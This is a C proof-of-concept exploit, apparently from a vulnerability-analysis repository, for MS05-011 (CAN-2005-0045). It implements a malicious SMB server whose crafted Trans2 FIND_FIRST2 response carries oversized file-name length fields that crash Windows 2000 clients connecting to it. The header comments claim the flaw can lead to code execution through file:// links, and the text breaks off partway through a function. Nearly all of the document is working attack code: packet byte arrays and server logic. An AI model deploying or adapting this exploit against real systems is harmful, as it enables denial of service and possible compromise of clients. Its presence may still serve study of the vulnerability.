lilbool/vuln-code-analysis
0
1/*
2 * Windows SMB Client Transaction Response Handling
3 *
4 * MS05-011
5 * CAN-2005-0045
6 *
7 * This works against >> Win2k <<
8 *
9 * cybertronic[at]gmx[dot]net
10 * http://www.livejournal.com/users/cybertronic/
11 *
12 * usage:
13 * gcc -o mssmb_poc mssmb_poc.c
14 * ./mssmb_poc
15 *
16 * connect via \\ip
17 * and hit the netbios folder!
18 *
19 * ***STOP: 0x00000050 (0xF115B000,0x00000001,0xFAF24690,
20 * 0x00000000)
21 * PAGE_FAULT_IN_NONPAGED_AREA
22 *
23 * The Client reboots immediately
24 *
25 * Technical Details:
26 * -----------------
27 *
28 * The driver MRXSMB.SYS is responsible for performing SMB
29 * client operations and processing the responses returned
30 * by an SMB server service. A number of important Windows
31 * File Sharing operations, and all RPC-over-named-pipes,
32 * use the SMB commands Trans (25h) and Trans2 (32h). A
33 * malicious SMB server can respond with specially crafted
34 * Transaction response data that will cause an overflow
35 * wherever the data is handled, either in MRXSMB.SYS or
36 * in client code to which it provides data. One example
37 * would be if the
38 *
39 * file name length field
40 *
41 * and the
42 *
43 * short file name length field
44 *
45 * in a Trans2 FIND_FIRST2 response packet can be supplied
46 * with inappropriately large values in order to cause an
47 * excessive memcpy to occur when the data is handled.
48 * In the case of these examples an attacker could leverage
49 * file:// links, that when clicked by a remote user, would
50 * lead to code execution.
51 *
52 */
53
54#include <stdio.h>
55#include <sys/socket.h>
56#include <netinet/in.h>
57#include <netdb.h>
58
59#define PORT 445
60
61unsigned char SmbNeg[] =
62"\x00\x00\x00\x55"
63"\xff\x53\x4d\x42" // SMB
64"\x72" // SMB Command: Negotiate Protocol (0x72)
65"\x00\x00\x00\x00" // NT Status: STATUS_SUCCESS (0x00000000)
66"\x98" // Flags: 0x98
67"\x53\xc8" // Flags2 : 0xc853
68"\x00\x00" // Process ID High: 0
69"\x00\x00\x00\x00\x00\x00\x00\x00" // Signature: 0000000000000000
70"\x00\x00" // Reserved: 0000
71"\x00\x00" // Tree ID: 0
72"\xff\xfe" // Process ID: 65279
73"\x00\x00" // User ID: 0
74"\x00\x00" // Multiplex ID: 0
75"\x11" // Word Count (WCT): 17
76"\x05\x00" // Dialect Index: 5, greater than LANMAN2.1
77"\x03" // Security Mode: 0x03
78"\x0a\x00" // Max Mpx Count: 10
79"\x01\x00" // Max VCs: 1
80"\x04\x11\x00\x00" // Max Buffer Size: 4356
81"\x00\x00\x01\x00" // Max Raw Buffer 65536
82"\x00\x00\x00\x00" // Session Key: 0x00000000
83"\xfd\xe3\x00\x80" // Capabilities: 0x8000e3fd
84"\x52\xa2\x4e\x73\xcb\x75\xc5\x01" // System Time: Jun 20, 2005 12:08:32.327125000
85"\x88\xff" // Server Time Zone: /120 min from UTC
86"\x00" // Key Length: 0
87"\x10\x00" // Byte Count (BCC): 16
88"\x9e\x12\xd7\x77\xd4\x59\x6c\x40" // Server GUID: 9E12D777D4596C40
89"\xbc\xc0\xb4\x22\x40\x50\x01\xd4";// BCC0B422405001D4
90
91unsigned char SessionSetupAndXNeg[] = // Negotiate ERROR Response
92"\x00\x00\x01\x1b"
93"\xff\x53\x4d\x42\x73\x16\x00\x00\xc0\x98\x07\xc8\x00\x00\x00\x00"
94"\x00\x00\x00\x00\x00\x00\x00\x00"
95"\x00\x00" // Tree ID: 0
96"\x00\x00" // Process ID: 0
97"\x00\x00" // USER ID
98"\x00\x00" // Multiplex ID: 0
99"\x04\xff\x00\x1b\x01\x00\x00\xa6\x00\xf0\x00\x4e\x54\x4c\x4d\x53"
100"\x53\x50\x00\x02\x00\x00\x00\x12\x00\x12\x00\x30\x00\x00\x00\x15"
101"\x82\x8a\xe0"
102"\x00\x00\x00\x00\x00\x00\x00\x00" // NTLM Challenge
103"\x00\x00\x00\x00\x00\x00\x00\x00\x64\x00\x64\x00\x42\x00\x00\x00"
104"\x53\x00\x45\x00\x52\x00\x56\x00\x49\x00\x43\x00\x45\x00\x50\x00"
105"\x43\x00\x02\x00\x12\x00\x53\x00\x45\x00\x52\x00\x56\x00\x49\x00"
106"\x43\x00\x45\x00\x50\x00\x43\x00\x01\x00\x12\x00\x53\x00\x45\x00"
107"\x52\x00\x56\x00\x49\x00\x43\x00\x45\x00\x50\x00\x43\x00\x04\x00"
108"\x12\x00\x73\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00"
109"\x70\x00\x63\x00\x03\x00\x12\x00\x73\x00\x65\x00\x72\x00\x76\x00"
110"\x69\x00\x63\x00\x65\x00\x70\x00\x63\x00\x06\x00\x04\x00\x01\x00"
111"\x00\x00\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f"
112"\x00\x77\x00\x73\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x57"
113"\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32"
114"\x00\x30\x00\x30\x00\x30\x00\x20\x00\x4c\x00\x41\x00\x4e\x00\x20"
115"\x00\x4d\x00\x61\x00\x6e\x00\x61\x00\x67\x00\x65\x00\x72\x00\x00";
116
117unsigned char SessionSetupAndXAuth[] =
118"\x00\x00\x00\x75"
119"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
120"\x00\x00\x00\x00\x00\x00\x00\x00"
121"\x00\x00" // Tree ID: 0
122"\x00\x00" // Process ID: 0
123"\x00\x00" // USER ID
124"\x00\x00" // Multiplex ID: 0
125"\x04\xff\x00\x75\x00\x01\x00\x00\x00\x4a\x00\x4e\x57\x00\x69\x00"
126"\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x35\x00\x2e\x00"
127"\x31\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00"
128"\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x4c\x00"
129"\x41\x00\x4e\x00\x20\x00\x4d\x00\x61\x00\x6e\x00\x61\x00\x67\x00"
130"\x65\x00\x72\x00\x00";
131
132unsigned char TreeConnectAndX[] =
133"\x00\x00\x00\x38"
134"\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
135"\x00\x00\x00\x00\x00\x00\x00\x00"
136"\x00\x00" // Tree ID: 0
137"\x00\x00" // Process ID: 0
138"\x00\x00" // USER ID
139"\x00\x00" // Multiplex ID: 0
140"\x07\xff\x00\x38\x00\x01\x00\xff\x01\x00\x00\xff\x01\x00\x00\x07"
141"\x00\x49\x50\x43\x00\x00\x00\x00";
142
143unsigned char SmbNtCreate [] =
144"\x00\x00\x00\x87"
145"\xff\x53\x4d\x42" // SMB
146"\xa2" // SMB Command: NT Create AndX (0xa2)
147"\x00\x00\x00\x00" // NT Status: STATUS_SUCCESS (0x00000000)
148"\x98" // Flags: 0x98
149"\x07\xc8" // Flags2 : 0xc807
150"\x00\x00" // Process ID High: 0
151"\x00\x00\x00\x00\x00\x00\x00\x00" // Signature: 0000000000000000
152"\x00\x00" // Reserved: 0000
153"\x00\x00" // Tree ID: 0
154"\x00\x00" // Process ID: 0
155"\x00\x00" // User ID: 0
156"\x00\x00" // Multiplex ID: 0
157"\x2a" // Word Count (WCT): 42
158"\xff" // AndXCommand: No further commands (0xff)
159"\x00" // Reserved: 00
160"\x87\x00" // AndXOffset: 135
161"\x00" // Oplock level: No oplock granted (0)
162"\x00\x00" // FID: 0
163"\x01\x00\x00\x00" // Create action: The file existed and was opened (1)
164"\x00\x00\x00\x00\x00\x00\x00\x00" // Created: No time specified (0)
165"\x00\x00\x00\x00\x00\x00\x00\x00" // Last Access: No time specified (0)
166"\x00\x00\x00\x00\x00\x00\x00\x00" // Last Write: No time specified (0)
167"\x00\x00\x00\x00\x00\x00\x00\x00" // Change: No time specified (0)
168"\x80\x00\x00\x00" // File Attributes: 0x00000080
169"\x00\x10\x00\x00\x00\x00\x00\x00" // Allocation Size: 4096
170"\x00\x00\x00\x00\x00\x00\x00\x00" // End Of File: 0
171"\x02\x00" // File Type: Named pipe in message mode (2)
172"\xff\x05" // IPC State: 0x05ff
173"\x00" // Is Directory: This is NOT a directory (0)
174"\x00\x00" // Byte Count (BCC): 0
175
176// crap
177"\x00\x00\x00\x0f\x00\x00\x00\x00"
178"\x00\x74\x7a\x4f\xac\x2d\xdf\xd9"
179"\x11\xb9\x20\x00\x10\xdc\x9b\x01"
180"\x12\x00\x9b\x01\x12\x00\x1b\xc2";
181
182unsigned char DceRpc[] =
183"\x00\x00\x00\x7c"
184"\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
185"\x00\x00\x00\x00\x00\x00\x00\x00"
186"\x00\x00" // Tree ID: 0
187"\x00\x00" // Process ID: 0
188"\x00\x00" // USER ID
189"\x00\x00" // Multiplex ID: 0
190"\x0a\x00\x00\x44\x00\x00\x00\x00\x00\x38\x00\x00\x00\x44\x00\x38"
191"\x00\x00\x00\x00\x00\x45\x00\x00\x05\x00\x0c\x03\x10\x00\x00\x00"
192"\x44\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10"
193"\x00\x00\x00\x00" // Assoc Group
194"\x0d\x00\x5c\x50\x49\x50\x45\x5c"
195"\x00\x00\x00" // srv or wks
196"\x73\x76\x63\x00\xff\x01\x00\x00\x00\x00\x00\x00\x00\x04\x5d\x88"
197"\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00"
198"\x00";
199
200unsigned char WksSvc[] =
201"\x00\x00\x00\xb0"
202"\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
203"\x00\x00\x00\x00\x00\x00\x00\x00"
204"\x00\x00" // Tree ID: 0
205"\x00\x00" // Process ID: 0
206"\x00\x00" // USER ID
207"\x00\x00" // Multiplex ID: 0
208"\x0a\x00\x00\x78\x00\x00\x00\x00\x00\x38\x00\x00\x00\x78\x00\x38"
209"\x00\x00\x00\x00\x00\x79\x00\x00\x05\x00\x02\x03\x10\x00\x00\x00"
210"\x78\x00\x00\x00\x01\x00\x00\x00\x60\x00\x00\x00\x00\x00\x00\x00"
211"\x64\x00\x00\x00\xb8\x0f\x16\x00\xf4\x01\x00\x00\xe6\x0f\x16\x00"
212"\xd2\x0f\x16\x00\x05\x00\x00\x00\x01\x00\x00\x00\x0a\x00\x00\x00"
213"\x00\x00\x00\x00\x0a\x00\x00\x00\x53\x00\x45\x00\x52\x00\x56\x00"
214"\x49\x00\x43\x00\x45\x00\x50\x00\x43\x00\x00\x00\x0a\x00\x00\x00"
215"\x00\x00\x00\x00\x0a\x00\x00\x00\x57\x00\x4f\x00\x52\x00\x4b\x00"
216"\x47\x00\x52\x00\x4f\x00\x55\x00\x50\x00\x00\x00\x00\x00\x00\x00";
217
218unsigned char SrvSvc[] =
219"\x00\x00\x00\xac"
220"\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
221"\x00\x00\x00\x00\x00\x00\x00\x00"
222"\x00\x00" // Tree ID: 0
223"\x00\x00" // Process ID: 0
224"\x00\x00" // USER ID
225"\x00\x00" // Multiplex ID: 0
226"\x0a\x00\x00\x74\x00\x00\x00\x00\x00\x38\x00\x00\x00\x74\x00\x38"
227"\x00\x00\x00\x00\x00\x75\x00\x00\x05\x00\x02\x03\x10\x00\x00\x00"
228"\x74\x00\x00\x00\x01\x00\x00\x00\x5c\x00\x00\x00\x00\x00\x00\x00"
229"\x65\x00\x00\x00\x68\x3d\x14\x00\xf4\x01\x00\x00"
230"\x80\x3d\x14\x00" // Server IP
231"\x05\x00\x00\x00\x01\x00\x00\x00\x03\x10\x05\x00\x9c\x3d\x14\x00"
232"\x0e\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00"
233"\x31\x00\x39\x00\x32\x00\x2e\x00\x31\x00\x36\x00\x38\x00\x2e\x00" // Server IP ( UNICODE )
234"\x32\x00\x2e\x00\x31\x00\x30\x00\x33\x00\x00\x00"
235"\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x55\x00"
236"\x00\x00\x00\x00";
237
238unsigned char SmbClose[] =
239"\x00\x00\x00\x23"
240"\xff\x53\x4d\x42" // SMB
241"\x04" // SMB Command: Close (0x04)
242"\x00\x00\x00\x00" // NT Status: STATUS_SUCCESS (0x00000000)
243"\x98" // Flags: 0x98
244"\x07\xc8" // Flags2 : 0xc807
245"\x00\x00" // Process ID High: 0
246"\x00\x00\x00\x00\x00\x00\x00\x00" // Signature: 0000000000000000
247"\x00\x00" // Reserved: 0000
248"\x00\x00" // Tree ID: 0
249"\x00\x00" // Process ID: 0
250"\x00\x00" // USER ID
251"\x00\x00" // Multiplex ID: 0
252"\x00" // Word Count (WCT): 0
253"\x00\x00"; // Byte Count (BCC): 0
254
255unsigned char NetrShareEnum[] =
256"\x00\x00\x01\x90"
257"\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
258"\x00\x00\x00\x00\x00\x00\x00\x00"
259"\x00\x00" // Tree ID: 0
260"\x00\x00" // Process ID: 0
261"\x00\x00" // USER ID
262"\x00\x00" // Multiplex ID: 0
263"\x0a\x00\x00\x58\x01\x00\x00\x00\x00\x38\x00\x00\x00\x58\x01\x38"
264"\x00\x00\x00\x00\x00\x59\x01\x00\x05\x00\x02\x03\x10\x00\x00\x00"
265"\x58\x01\x00\x00\x01\x00\x00\x00\x40\x01\x00\x00\x00\x00\x00\x00"
266"\x01\x00\x00\x00\x01\x00\x00\x00\x54\x0a\x17\x00\x04\x00\x00\x00"
267"\xa0\x28\x16\x00\x04\x00\x00\x00\x80\x48\x16\x00\x03\x00\x00\x80"
268"\x8a\x48\x16\x00\x6e\x48\x16\x00\x00\x00\x00\x00\x7e\x48\x16\x00"
269"\x48\x48\x16\x00\x00\x00\x00\x80\x56\x48\x16\x00\x20\x48\x16\x00"
270"\x00\x00\x00\x80\x26\x48\x16\x00\x05\x00\x00\x00\x00\x00\x00\x00"
271"\x05\x00\x00\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x36\x00"
272"\x0b\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x52\x00\x65\x00"
273"\x6d\x00\x6f\x00\x74\x00\x65\x00\x2d\x00\x49\x00\x50\x00\x43\x00"
274"\x00\x00\x37\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00"
275"\x6e\x00\x65\x00\x74\x00\x62\x00\x69\x00\x6f\x00\x73\x00\x00\x00"
276"\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
277"\x07\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x41\x00\x44\x00"
278"\x4d\x00\x49\x00\x4e\x00\x24\x00\x00\x00\x00\x00\x0c\x00\x00\x00"
279"\x00\x00\x00\x00\x0c\x00\x00\x00\x52\x00\x65\x00\x6d\x00\x6f\x00"
280"\x74\x00\x65\x00\x61\x00\x64\x00\x6d\x00\x69\x00\x6e\x00\x00\x00"
281"\x03\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x43\x00\x24\x00"
282"\x00\x00\x39\x00\x11\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00"
283"\x53\x00\x74\x00\x61\x00\x6e\x00\x64\x00\x61\x00\x72\x00\x64\x00"
284"\x66\x00\x72\x00\x65\x00\x69\x00\x67\x00\x61\x00\x62\x00\x65\x00"
285"\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
286
287unsigned char OpenPrinterEx[] =
288"\x00\x00\x00\x68"
289"\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
290"\x00\x00\x00\x00\x00\x00\x00\x00"
291"\x00\x00" // Tree ID: 0
292"\x00\x00" // Process ID: 0
293"\x00\x00" // USER ID
294"\x00\x00" // Multiplex ID: 0
295"\x0a\x00\x00\x30\x00\x00\x00\x00\x00\x38\x00\x00\x00\x30\x00\x38"
296"\x00\x00\x00\x00\x00\x31\x00\x00\x05\x00\x02\x03\x10\x00\x00\x00"
297"\x30\x00\x00\x00\x01\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00"
298"\x00\x00\x00\x00\x24\xd7\x9c\xf8\xbb\xe1\xd9\x11\xb9\x29\x00\x10"
299"\xdc\x4a\x6b\xbb\x00\x00\x00\x00";
300
301unsigned char ClosePrinter[] =
302"\x00\x00\x00\x68"
303"\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
304"\x00\x00\x00\x00\x00\x00\x00\x00"
305"\x00\x00" // Tree ID: 0
306"\x00\x00" // Process ID: 0
307"\x00\x00" // USER ID
308"\x00\x00" // Multiplex ID: 0
309"\x0a\x00\x00\x30\x00\x00\x00\x00\x00\x38\x00\x00\x00\x30\x00\x38"
310"\x00\x00\x00\x00\x00\x31\x00\x00\x05\x00\x02\x03\x10\x00\x00\x00"
311"\x30\x00\x00\x00\x02\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00"
312"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
313"\x00\x00\x00\x00\x00\x00\x00\x00";
314
315unsigned char OpenHklm[] =
316"\x00\x00\x00\x68"
317"\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
318"\x00\x00\x00\x00\x00\x00\x00\x00"
319"\x00\x00" // Tree ID: 0
320"\x00\x00" // Process ID: 0
321"\x00\x00" // USER ID
322"\x00\x00" // Multiplex ID: 0
323"\x0a\x00\x00\x30\x00\x00\x00\x00\x00\x38\x00\x00\x00\x30\x00\x38"
324"\x00\x00\x00\x00\x00\x31\x00\x00\x05\x00\x02\x03\x10\x00\x00\x00"
325"\x30\x00\x00\x00\x01\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00"
326"\x00\x00\x00\x00\x4e\x4c\xb2\xf8\xbb\xe1\xd9\x11\xb9\x29\x00\x10"
327"\xdc\x4a\x6b\xbb\x00\x00\x00\x00";
328
329unsigned char OpenKey[] =
330"\x00\x00\x00\x68"
331"\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
332"\x00\x00\x00\x00\x00\x00\x00\x00"
333"\x00\x00" // Tree ID: 0
334"\x00\x00" // Process ID: 0
335"\x00\x00" // USER ID
336"\x00\x00" // Multiplex ID: 0
337"\x0a\x00\x00\x30\x00\x00\x00\x00\x00\x38\x00\x00\x00\x30\x00\x38"
338"\x00\x00\x00\x00\x00\x31\x00\x00\x05\x00\x02\x03\x10\x00\x00\x00"
339"\x30\x00\x00\x00\x02\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00"
340"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
341"\x00\x00\x00\x00\x05\x00\x00\x00";
342
343unsigned char CloseKey[] =
344"\x00\x00\x00\x68"
345"\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
346"\x00\x00\x00\x00\x00\x00\x00\x00"
347"\x00\x00" // Tree ID: 0
348"\x00\x00" // Process ID: 0
349"\x00\x00" // USER ID
350"\x00\x00" // Multiplex ID: 0
351"\x0a\x00\x00\x30\x00\x00\x00\x00\x00\x38\x00\x00\x00\x30\x00\x38"
352"\x00\x00\x00\x00\x00\x31\x00\x00\x05\x00\x02\x03\x10\x00\x00\x00"
353"\x30\x00\x00\x00\x03\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00"
354"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
355"\x00\x00\x00\x00\x00\x00\x00\x00";
356
357unsigned char NetBios1[] =
358"\x00\x00\x00\x94"
359"\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
360"\x00\x00\x00\x00\x00\x00\x00\x00"
361"\x00\x00" // Tree ID: 0
362"\x00\x00" // Process ID: 0
363"\x00\x00" // USER ID
364"\x00\x00" // Multiplex ID: 0
365"\x0a\x00\x00\x5c\x00\x00\x00\x00\x00\x38\x00\x00\x00\x5c\x00\x38"
366"\x00\x00\x00\x00\x00\x5d\x00\x00\x05\x00\x02\x03\x10\x00\x00\x00"
367"\x5c\x00\x00\x00\x01\x00\x00\x00\x44\x00\x00\x00\x00\x00\x00\x00"
368"\x01\x00\x00\x00\xc0\xa2\x16\x00\xae\xc2\x16\x00\x00\x00\x00\x00"
369"\xbe\xc2\x16\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00"
370"\x6e\x00\x65\x00\x74\x00\x62\x00\x69\x00\x6f\x00\x73\x00\x00\x00"
371"\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x2e\x00"
372"\x00\x00\x00\x00";
373
374unsigned char NetBios2[] =
375"\x00\x00\x00\x3e"
376"\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
377"\x00\x00\x00\x00\x00\x00\x00\x00"
378"\x00\x00" // Tree ID: 0
379"\x00\x00" // Process ID: 0
380"\x00\x00" // USER ID
381"\x00\x00" // Multiplex ID: 0
382"\x07\xff\x00\x3e\x00\x01\x00\xff\x01\x00\x00\xff\x01\x00\x00\x0d"
383"\x00\x41\x3a\x00\x4e\x00\x54\x00\x46\x00\x53\x00\x00\x00";
384
385// Trans2 Response, QUERY_PATH_INFO
386unsigned char Trans2Response1[] =
387"\x00\x00\x00\x64"
388"\xff\x53\x4d\x42" // SMB
389"\x32" // SMB Command: Trans2 (0x32)
390"\x00\x00\x00\x00" // NT Status: STATUS_SUCCESS (0x00000000)
391"\x98" // Flags: 0x98
392"\x07\xc8" // Flags2 : 0xc807
393"\x00\x00" // Process ID High: 0
394"\x00\x00\x00\x00\x00\x00\x00\x00" // Signature: 0000000000000000
395"\x00\x00" // Reserved: 0000
396"\x00\x00" // Tree ID: 0
397"\x00\x00" // Process ID: 0
398"\x00\x00" // USER ID
399"\x00\x00" // Multiplex ID: 0
400"\x0a" // Word Count (WCT): 10
401"\x02\x00" // Total Parameter Count: 2
402"\x28\x00" // Total Data Count: 40
403"\x00\x00" // Reserved: 0000
404"\x02\x00" // Parameter Count: 2
405"\x38\x00" // Parameter Offset: 56
406"\x00\x00" // Parameter Displacement: 0
407"\x28\x00" // Data Count: 40
408"\x3c\x00" // Data Offset: 60
409"\x00\x00" // Data Displacement: 0
410"\x00" // Setup Count: 0
411"\x00" // Reserved: 00
412"\x2d\x00" // Byte Count (BCC): 45
413"\x00" // Padding: 00
414"\x00\x00" // EA Error offset: 0
415"\x00\x01" // Padding: 0001
416"\xe8\x35\xcf\x94\x39\x73\xc5\x01" // Created: Jun 17, 2005 05:39:19.686500000
417"\x8c\x24\xba\x5c\x3a\x73\xc5\x01" // Last Access: Jun 17, 2005 05:44:55.092750000
418"\xe8\x35\xcf\x94\x39\x73\xc5\x01" // Last Write: Jun 17, 2005 05:39:19.686500000
419"\x9c\x81\x67\x98\x39\x73\xc5\x01" // Change: Jun 17, 2005 05:39:25.717750000
420"\x10\x00\x00\x00" // File Attributes: 0x00000010
421"\x00\x00\x00\x00"; // Unknown Data: 00000000
422
423// Trans2 Response, QUERY_PATH_INFO
424unsigned char Trans2Response2[] = // ERROR Response
425"\x00\x00\x00\x23"
426"\xff\x53\x4d\x42\x32\x34\x00\x00\xc0\x98\x07\xc8\x00\x00\x00\x00"
427"\x00\x00\x00\x00\x00\x00\x00\x00"
428"\x00\x00" // Tree ID: 0
429"\x00\x00" // Process ID: 0
430"\x00\x00" // USER ID
431"\x00\x00" // Multiplex ID: 0
432"\x00\x00\x00";
433
434// Trans2 Response, FIND_FIRST2, Files: . ..
435unsigned char Trans2Response3[] =
436"\x00\x00\x01\x0c"
437"\xff\x53\x4d\x42" // SMB
438"\x32" // SMB Command: Trans2 (0x32)
439"\x00\x00\x00\x00" // NT Status: STATUS_SUCCESS (0x00000000)
440"\x98" // Flags: 0x98
441"\x07\xc8" // Flags2 : 0xc807
442"\x00\x00" // Process ID High: 0
443"\x00\x00\x00\x00\x00\x00\x00\x00" // Signature: 0000000000000000
444"\x00\x00" // Reserved: 0000
445"\x00\x00" // Tree ID: 0
446"\x00\x00" // Process ID: 0
447"\x00\x00" // USER ID
448"\x00\x00" // Multiplex ID: 0
449"\x0a" // Word Count (WCT): 10
450"\x0a\x00" // Total Parameter Count: 10
451"\xc8\x00" // Total Data Count: 200
452"\x00\x00" // Reserved: 0000
453"\x0a\x00" // Parameter Count: 10
454"\x38\x00" // Parameter Offset: 56
455"\x00\x00" // Parameter Displacement: 0
456"\xc8\x00" // Data Count: 200
457"\x44\x00" // Data Offset: 68
458"\x00\x00" // Data Displacement: 0
459"\x00" // Setup Count: 0
460"\x00" // Reserved: 00
461"\xd5\x00" // Byte Count (BCC): 213
462"\x00" // Padding: 00
463"\x01\x08" // Search ID: 0x0801
464"\x02\x00" // Seatch Count: 2
465"\x01\x00" // End of Search: 1
466"\x00\x00" // EA Error offset: 0
467"\x60\x00" // Last Name offset: 96
468"\x38\x00" // Padding: 3800
469"\x60\x00\x00\x00" // Next Entry offset: 96
470"\x00\x00\x00\x00" // File Index: 0
471"\xe8\x35\xcf\x94\x39\x73\xc5\x01" // Created: Jun 17, 2005 05:39:19.686500000
472"\xac\x09\x3c\xae\x39\x73\xc5\x01" // Last Access: Jun 17, 2005 05:40:02.342750000
473"\xe8\x35\xcf\x94\x39\x73\xc5\x01" // Last Write: Jun 17, 2005 05:39:19.686500000
474"\x9c\x81\x67\x98\x39\x73\xc5\x01" // Change: Jun 17, 2005 05:39:25.717750000
475"\x00\x00\x00\x00\x00\x00\x00\x00" // End of File: 0
476"\x00\x00\x00\x00\x00\x00\x00\x00" // Allocation Size: 0
477"\x10\x00\x00\x00" // File Attributes: 0x00000010
478//"\x02\x00\x00\x00" // File Name Len: 2
479"\xff\xff\xff\xff" // Bad File Name Len
480"\x00\x00\x00\x00" // EA List Length: 0
481//"\x00" // Short File Name Len: 0
482"\xff" // Bad Short File Name Len
483"\x00" // Reserved: 00
484"\x00\x00\x00\x00\x00\x00\x00\x00" // Short File Name:
485"\x00\x00\x00\x00\x00\x00\x00\x00" // Short File Name:
486"\x00\x00\x00\x00\x00\x00\x00\x00" // Short File Name:
487"\x2e\x00" // File Name: .
488"\x00\x00\x00\x00" // Next Entry Offset: 0
489"\x00\x00\x00\x00" // File Index: 0
490"\xe8\x35\xcf\x94\x39\x73\xc5\x01" // Created: Jun 17, 2005 05:39:19.686500000
491"\xac\x09\x3c\xae\x39\x73\xc5\x01" // Last Access: Jun 17, 2005 05:40:02.342750000
492"\xe8\x35\xcf\x94\x39\x73\xc5\x01" // Last Write: Jun 17, 2005 05:39:19.686500000
493"\x9c\x81\x67\x98\x39\x73\xc5\x01" // Change: Jun 17, 2005 05:39:25.717750000
494"\x00\x00\x00\x00\x00\x00\x00\x00" // End Of File: 0
495"\x00\x00\x00\x00\x00\x00\x00\x00" // Allocation Size: 0
496"\x10\x00\x00\x00" // File Attributes: 0x00000010
497"\x04\x00\x00\x00" // File Name Len: 4
498"\x00\x00\x00\x00" // EA List Length: 0
499"\x00" // Short File Name Len: 0
500"\x00" // Reserved: 00
501"\x00\x00\x00\x00\x00\x00\x00\x00" // Short File Name:
502"\x00\x00\x00\x00\x00\x00\x00\x00" // Short File Name:
503"\x00\x00\x00\x00\x00\x00\x00\x00" // Short File Name:
504"\x2e\x00\x2e\x00" // File Name: ..
505"\x00\x00\x00\x00\x00\x00"; // Unknown Data: 000000000000
506
507int
508check_interface ( char* str )
509{
510 int i, j, wks = 0, srv = 0, spl = 0, wrg = 0, foo = 0;
511
512 //Interface UUID
513 unsigned char wks_uuid[] = "\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3\xf8\x7e\x34\x5a";
514 unsigned char srv_uuid[] = "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88";
515 unsigned char spl_uuid[] = "\x78\x56\x34\x12\x34\x12\xcd\xab\xef\x00\x01\x23\x45\x67\x89\xab";
516 unsigned char wrg_uuid[] = "\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03";
517
518 for ( i = 0; i < 16; i++ )
519 {
520 j = 0;
521 if ( str[120 + i] < 0 )
522 {
523 if ( ( str[120 + i] + 0x100 ) == wks_uuid[i] )
524 { wks++; j = 1; }
525 if ( ( str[120 + i] + 0x100 ) == srv_uuid[i] )
526 { srv++; j = 1; }
527 if ( ( str[120 + i] + 0x100 ) == spl_uuid[i] )
528 { spl++; j = 1; }
529 if ( ( str[120 + i] + 0x100 ) == wrg_uuid[i] )
530 { wrg++; j = 1; }
531 if ( j == 0 )
532 foo++;
533 }
534 else
535 {
536 if ( str[120 + i] == wks_uuid[i] )
537 { wks++; j = 1; }
538 if ( str[120 + i] == srv_uuid[i] )
539 { srv++; j = 1; }
540 if ( str[120 + i] == spl_uuid[i] )
541 { spl++; j = 1; }
542 if ( str[120 + i] == wrg_uuid[i] )
543 { wrg++; j = 1; }
544 if ( j == 0 )
545 foo++;
546 }
547 }
548 if ( wks == 16 )
549 return ( 0 );
550 else if ( srv == 16 )
551 return ( 1 );
552 else if ( spl == 16 )
553 return ( 2 );
